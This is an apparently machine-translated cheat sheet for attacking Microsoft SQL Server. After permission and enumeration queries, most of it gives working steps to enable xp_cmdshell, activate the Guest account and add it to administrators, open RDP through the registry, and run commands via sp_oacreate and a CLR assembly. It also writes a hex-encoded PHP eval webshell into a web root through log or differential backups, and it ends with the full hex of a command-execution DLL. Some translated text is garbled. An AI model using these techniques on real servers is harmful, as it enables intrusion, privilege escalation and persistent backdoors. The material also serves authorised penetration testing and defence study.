1. mssql permission

• sa authority: database operation, file management, command execution, registry reading, etc. Is the highest permission of mssql
• db permissions: user administrators for file management, database operation, etc
• public permission: database operation guest users

Judge the current database permissions

Judge whether it is sa jurisdiction

select is_sivrolemember('sysadmin')

Judge whether it is db_owner jurisdiction

select is_member('db_owner')

Judge whether it is public jurisdiction

select is_srvrolemember('public')

2. mssql default database

• master database: controls all aspects of sql server. There are configuration information, user login information and information currently running in the server in the database
• Model database: model database is the template for establishing all user databases
• msdb database: a special case of sql server. It is actually a user database. The difference is what sql server does with this database. All task scheduling, alarms and operators are stored in msdb database. The database can be used to store all backup history
• Tempdb database: tempdb database is a very special database for all users accessing your sql server. This library is used to store all temporary tables, stored procedures and other temporary things established by sql server. Never create a permanently saved table in this library

3. Common database statements

select @@version;       #Query the version of the database
select @@servername;    #Query service name
select host_name();     #Query the host name. If navicat is used for remote connection, the host name is the local name
select db_name();       #Query current database name
select db_name(1);      #Query first database name
select db_name(2);      #Query the second database name
select user;            #Query the owner of the current database, and the result is dbo. Dbo is the default user of each database and has owner permissions. Its full name is datebaseOwner, that is, DbOwner 
use tempdb              #Switch to tempdb table  
top n                   #Query the first n records
limit 2,3               #Query the 3 data starting from item 2, that is, 2, 3 and 4
select substring('string',2,1)     #Intercept 1 character with index 2 of the given string
select ascii('a')                  #Queries the ascii value of a given string
select len('string')               #Query the length of a given string
EXEC sp_spaceused @updateusage = N'TRUE';  #Query the size of the current database
sp_spaceused 'Table name'                #Query specifies the size of the table name
EXEC master.sys.xp_dirtree '\\192.168.106.5\xx.txt',0,1;

Judge whether it is SA jurisdiction
select is_srvrolemember('sysadmin')     
Judge whether it is db_owner jurisdiction  
select is_member('db_owner')
Judge whether it is public jurisdiction
select is_srvrolemember('public')

#Database connection
server=127.0.0.1;UID=sa;PWD=123456;database=master;Provider=SQLOLEDB
mssql://sa:123456@127.0.0.1/XCCMS_SocialBusinessDB
 
count(name)Is the total number of queries
name Is the query name
*Yes query details
 
#query data base
select count(name) from sysdatabases     #Query the number of databases. This command can be executed only when the current database is master
select name  from sysdatabases           #Name of the query database
select * from sysdatabases               #Query information of all databases
 
#Query data table
select count(name) from sysobjects where type='U' #Query the number of tables in the current database
select name from sysobjects where type='U'  #Query the names of all tables in the current database
select * from sysobjects where type='U'    #Query the details of all tables in the current database
 
select count(name) from test..sysobjects where xtype='U'  #Query the number of tables in the specified test database
select name from test..sysobjects where xtype='U'         #Query the name of the table in the specified test database
select * from test..sysobjects where xtype='U'            #Query the details of the table in the specified test database
 
#Query column
select count(name) from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')            #Query the number of columns in the specified users table of the current database
select name from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')         #Queries the names of all columns in the specified users table of the current database
select * from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')      #Query the column details of the specified users table of the current database
 
select count(name) from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')     #Query the number of columns in the specified users table of the specified test database
select name from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #Queries the names of all columns in the specified users table of the specified test database
select * from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #Queries the column details of the specified users table of the specified test database

Query the size of all tables in the current database

declare  @table_spaceused table     	#Declare variables, for example: @ declare variable name variable type
(name   nvarchar(100)
,rows   int
,reserved   nvarchar(100)
,data   nvarchar(100)
,index_size nvarchar(100)
,unused nvarchar(100)
)

insert into @table_spaceused
(name,rows,reserved,data,index_size,unused )
exec sp_MSforeachtable
@command1='exec sp_spaceused ''?'''

select * from @table_spaceused

4. Enable SA permission xp_cmdshell get host permissions

1. Judgment XP_ Open cmdshell

select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'  

Return 1 is open; Return 0 to close

1. If xp_ The cmdshell permission is not enabled. We can execute the following command to enable it. The following four steps enable xp -- cmdshell

execute('sp_configure "show advanced options",1')  #Set the value of this option to 1
execute('reconfigure')                             #Save settings
execute('sp_configure "xp_cmdshell", 1')           #Set XP_ The value of the cmdshell is set to 1
execute('reconfigure')                             #Save settings
execute('sp_configure')                            #View configuration
execute('xp_cmdshell "whoami"')                    #Execute system commands
 
perhaps
exec sp_configure 'show advanced options',1;       
reconfigure;                                       
exec sp_configure 'xp_cmdshell',1;                 
reconfigure;                                      
exec sp_configure;                                 
exec xp_cmdshell 'whoami';                         
 
 
After you can execute system permissions,The premise is that the host permissions obtained are administrators In the group
exec xp_cmdshell 'net user Guest 123456'              #Set password for guest user
exec xp_cmdshell 'net user Guest /active:yes'         #Activate guest user
exec xp_cmdshell 'net localgroup administrators Guest /add'  #Add the guest user to the administrators user group
exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'        #Open port 3389

execute('sp_configure "show advanced options", 1 ') # sets the value of this option to 1
execute('reconfigure ') # saves the settings

1. Although use the first step to judge XP_ Whether the cmdshell is open returns 1, but the command cannot be executed. Using execute('xp_cmdshell "whoami '), this command is disabled by default

4. Then use the execute step above to execute xp_cmdshell open

5. SA permission usage sp_oacreate executes system commands

1. Use sp_ Precondition of oacreate: the sql server data service is not downgraded

   We can use the com component SP in sql server_ Oacreate to execute system commands.

2. The following command can view sp_ Is oacreate allowed

   declare @shell int 
   exec sp_oacreate 'wscript.shell',@shell output 
   exec sp_oamethod @shell,'run',null,'whoami'
   

1. Turn on sp_oacreate

   EXEC sp_configure 'show advanced options', 1;    
   	-- be similar to exe('sp_configure' "show advanced options",1)
   RECONFIGURE WITH OVERRIDE;  
   EXEC sp_configure 'Ole Automation Procedures', 1;  
   RECONFIGURE WITH OVERRIDE;
   

1. It can be seen that sp_oacreate command has no echo

   -- Execute the add user command to test
   declare @shell int 
   exec sp_oacreate 'wscript.shell',@shell output 
   exec sp_oamethod @shell,'run',null,
   'c:\windows\system32\cmd.exe /c net user hack Password@ /add'   
   	--above sql server The language is fixed, and the last line is the system command executed
   

6. SA authority uses CLR to execute system commands

There are two ways to create a CLR:

• Create using DLL files
• Create using file hexadecimal stream

1. Enable CLR function

exec sp_configure 'show advanced options', 1;
RECONFIGURE;
Exec sp_configure 'clr enabled', 1;
RECONFIGURE;
-- If there is a permission problem, execute the following command
alter database [master] set TRUSTWORTHY on  --Unsafe assemblies will be imported later, so the database will be marked as safe
EXEC sp_changedbowner 'sa'

--Import assembly
CREATE ASSEMBLY [WarSQLKit] 
	AUTHORIZATION [dbo] FROM Hexadecimal data 
	WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER 
	AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

—- Execute command
EXEC [dbo].[SqlStoredProcedure1]; For example: exec sp_cmdExec 'whoami'

-- Delete assembly
DROP PROCEDURE sp_cmdExec;
DROP ASSEMBLY [WarSQLKit];

6. DB_owner permission LOG backup Getshell

Whether LOG backup or differential backup, it is a Trojan horse written in one sentence during the backup process

1. Common backup strategies for sql server

   • Weekly full backup
   • Daily differential backup
   • Hourly transaction backup

2. Utilization premise

   • The database backup file exists on the target machine. In other words, if we use the test database, the database backup file must exist in the test database, and the recovery mode must be the full mode
   • Know the absolute path of the website
   • Support Stack Injection

3. Injection code

   alter database Database name set RECOVERY FULL;   #Modify the database recovery mode to full mode
   create table cmd (a image);        		#Create a table cmd with only one column A and the type is image
   backup log Database name to disk= 'C:\phpstudy\WWW\1.php' with init;  #Backup table to specified path
   
   insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);  
   	#Insert a sentence into the cmd table, and the hexadecimal is a sentence <? php @eval($_POST['x']);?>
   	
   backup log Database name to disk='C:\phpstudy\WWW\2.php';   	#Back up the operation log to the specified file
   drop table cmd;    										#Delete cmd table
   

4. overview

   Using log backup is similar to mysql's Trojan horse that writes a sentence in the log.

   Modify the database recovery mode to full mode, then create a table and back up the table to the specified path

   Insert a sentence into the table, back up the log file to the path we know, and finally delete the created table

7. DB_owner permission differential backup Getshell

Differential backup may crash the website and is not recommended

1. Utilization premise

   • Know the absolute path of the website
   • Support Stack Injection

2. Code injection

   create table [dbo].[test] ([cmd] [image])    -- Create table dbo.test，List as cmd type image
   
   declare @a sysname,@s nvarchar(4000) 
   	select @a=db_name(),@s=xie backup log @a to disk = @s 
   	with init,no_truncate              -- Backup table
   
   insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e)
       -- To table test of cmd Insert a sentence into the column
       
   declare @a sysname,@s nvarchar(4000) select 	@a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate
   	-- Back up the operation log to the specified file
   
   Drop table [test]   		 --delete test surface
   

   • In the third line, 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e is a Trojan horse <? php @eval($_POST[x]);?> Hexadecimal representation of
   • 0x43003a005c00700068007000730074007500640079005c005700570057005c007300680065006c06c002e00700068007000 in the fourth line is C: \ phpstudy \ www \ shell Hexadecimal representation of PHP

3. summary

   Use data differential backup. Similar to the LOG backup above, but the database recovery mode is not set to full mode

   If we insert a sentence Trojan horse into the table, it will be recorded in the log, and there will be a sentence Trojan horse in the log.

Supplemental CLR import assembly

CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;